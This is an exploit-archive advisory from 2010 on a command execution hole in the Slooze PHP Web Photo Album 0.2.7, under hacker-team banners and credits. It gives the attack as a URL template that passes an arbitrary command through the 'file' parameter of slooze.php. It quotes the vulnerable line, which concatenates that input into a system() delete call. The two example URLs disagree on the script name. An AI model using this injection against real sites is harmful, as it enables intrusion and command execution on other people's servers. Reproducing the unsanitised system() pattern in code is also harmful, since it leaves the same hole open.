[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Slooze PHP Web Photo Album v0.2.7 Command Execution Vulnerability
# Published : 2010-05-05
# Author : Sn!pEr.S!Te hacker
# Previous Title : PHP-NUKE v5.0 viewslink Remote SQL Injection
# Next Title : DBHcms 1.1.4 Stored XSS
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' __ /'__` / __ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ >>Remote Command Execution Vulnerability 0
0 /___/ 1
1 1
0 0
1 1
0 0
1 ######################################## 1
0 Sn!pEr Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
(slooze.php) Command Execution Vulnerability
#[+] Author : Sn!pEr.S!Te hacker #
# [+] Email : sniper-site@HoTMaiL.coM #
# [+] T34M Sn!pEr.S!Te Hacker #
#[+] Site : www.v4-team.com/cc and www.sa-hacker.com
# [+] 5-5-2010 #
# [+] Script : slooze-0.2.7 #
# [+] Download: http://sourceforge.net/projects/slooze/files/slooze/0.2.7/slooze-0.2.7.zip/download #
# Version: [0.2.7] #
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1#
Exploit :src/slooze.php
http://localhost/src/slooze.php?file= [your command]
http://127.0.0.1/src/slooz.php?file=[your command]
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1#
system('del "' . $this->cachePath . $file . '"'); /* Windows platforms */
line :1003
my friend : liar -ysefe - Dj - sm hacker-baby hacker-dmar Hacker